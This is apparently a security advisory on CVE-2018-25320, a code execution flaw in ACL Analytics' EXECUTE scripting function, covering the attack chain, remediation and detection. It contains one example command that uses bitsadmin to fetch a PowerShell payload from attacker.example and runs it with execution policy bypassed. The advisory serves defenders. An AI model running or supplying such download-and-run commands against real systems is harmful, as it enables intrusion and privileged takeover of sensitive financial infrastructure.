CVE-2018-25320: ACL Analytics Arbitrary Code Execution via EXECUTE Function

Executive Summary

CVE-2018-25320 is a critical arbitrary code execution vulnerability in ACL Analytics (versions 11.x through 13.0.0.579) with a CVSS score of 9.8. The flaw allows an attacker to execute arbitrary operating system commands by abusing the built-in EXECUTE function within the ACL scripting environment. Successful exploitation enables attackers to download and run malicious payloads — including PowerShell scripts fetched via bitsadmin — establishing persistent SYSTEM-level access.

Despite its 2018 CVE identifier, this vulnerability was formally catalogued by NVD in May 2026 and represents a significant risk for organizations still running unpatched ACL Analytics installations.

Vulnerability Overview

Root Cause

ACL Analytics exposes an EXECUTE function within its scripting language that can be used to invoke arbitrary operating system commands. This function lacks sufficient sandboxing or allow-listing controls, enabling an attacker with access to the ACL scripting environment to run any command under the process's security context — typically SYSTEM privileges.

Attack Chain

1. Attacker gains access to ACL Analytics scripting environment
   (e.g., compromised user credentials, insider, or phishing)
2. Crafts an ACL script invoking the EXECUTE function with a malicious payload
3. EXECUTE calls bitsadmin to download a PowerShell script from attacker-controlled server
4. PowerShell script executes with SYSTEM privileges
5. Attacker establishes persistence, exfiltrates audit data, or pivots laterally

Example Abuse Pattern

EXECUTE CMD "bitsadmin /transfer job https://attacker.example/payload.ps1 C:\payload.ps1 && powershell -ep bypass -f C:\payload.ps1"

The use of bitsadmin as a living-off-the-land binary (LOLBin) is a well-documented technique that often bypasses signature-based AV detection, making this attack particularly stealthy.

Why ACL Analytics Is a High-Value Target

ACL Analytics is widely deployed in enterprise audit, compliance, and risk management workflows, often with direct access to:

• Financial records and general ledger data
• ERP system integrations (SAP, Oracle, PeopleSoft)
• HR and payroll data
• Procurement and vendor data

A compromise of an ACL Analytics installation can yield access to sensitive financial and compliance data without triggering traditional security tooling that focuses on endpoint behavior rather than audit software.

Affected Versions and Remediation

Immediate Actions

1. Upgrade to ACL Analytics 13.1.0 or later immediately
2. Audit all existing ACL scripts for use of the EXECUTE function
3. Review access to the ACL scripting environment — restrict to authorized audit personnel only
4. Enable logging on all ACL script execution events and forward to SIEM
5. Hunt for indicators of bitsadmin, PowerShell invocation from ACL processes in endpoint logs
6. Network controls — block outbound bitsadmin/BITS transfers from audit workstations if not operationally required

Detection

Endpoint

SIEM / EDR Queries

Look for process chains where ACLAnalytics.exe or related ACL processes spawn cmd.exe, bitsadmin.exe, or powershell.exe. This is highly anomalous and should trigger immediate investigation.

Key Takeaways

1. CVSS 9.8 — Arbitrary OS code execution via built-in EXECUTE function
2. ACL Analytics targets are audit and compliance infrastructure with access to sensitive financial data
3. Upgrade to 13.1.0+ immediately; the patch removes unsafe execution capabilities
4. Living-off-the-land abuse (bitsadmin + PowerShell) makes exploitation stealthy
5. Audit ACL script inventories — review all scripts using EXECUTE for unauthorized additions

References

• NVD — CVE-2018-25320
• MITRE CVE Entry
• CISA — Known Exploited Vulnerabilities Catalog